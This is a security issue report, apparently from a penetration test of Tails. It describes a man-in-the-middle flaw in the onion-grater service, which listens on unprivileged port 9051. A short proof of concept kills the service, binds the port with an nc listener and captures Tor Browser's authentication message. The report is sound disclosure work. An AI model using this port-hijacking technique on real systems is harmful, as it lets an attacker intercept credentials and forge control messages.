MITM of onion-grater service
https://git.radicallyopensecurity.com/ros/pen-tails/-/issues/9
Description
Since the onion-grater service runs on non-privileged ports, a local user may be able to bind his socket faster than the onion-grater service. As a result, an attacker may be able to forge messages or leak information.
The following shows an example (as root), just for demonstration purposes:
POC
We see, that the port is already bound to a PID:
amnesia@amnesia:~/$ sudo netstat -tulpen
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 0.0.0.0:9051 0.0.0.0:* LISTEN 0 20693 5297/python3
The port is bound by the /usr/local/lib/onion-grater
application.
amnesia@amnesia:~/$ ps -aux | grep 5297
root 5297 0.5 0.4 656384 39748 ? Ssl Mar30 3:05 /usr/bin/python3 -u /usr/local/lib/onion-grater --listen-address 0.0.0.0
We kill the application as root and bind the Port as the low-privileged amnesia user.
sudo kill -9 5297
nc -lvp 9051
We start the TOR Browser with /usr/local/lib/run-tor-browser-in-netns
and get the following output:
Listening on 0.0.0.0 9051
Connection received on 10.200.1.2 53884
authenticate passwd
Patch
- Run all the services on higher privileged ports
Edited by intrigeri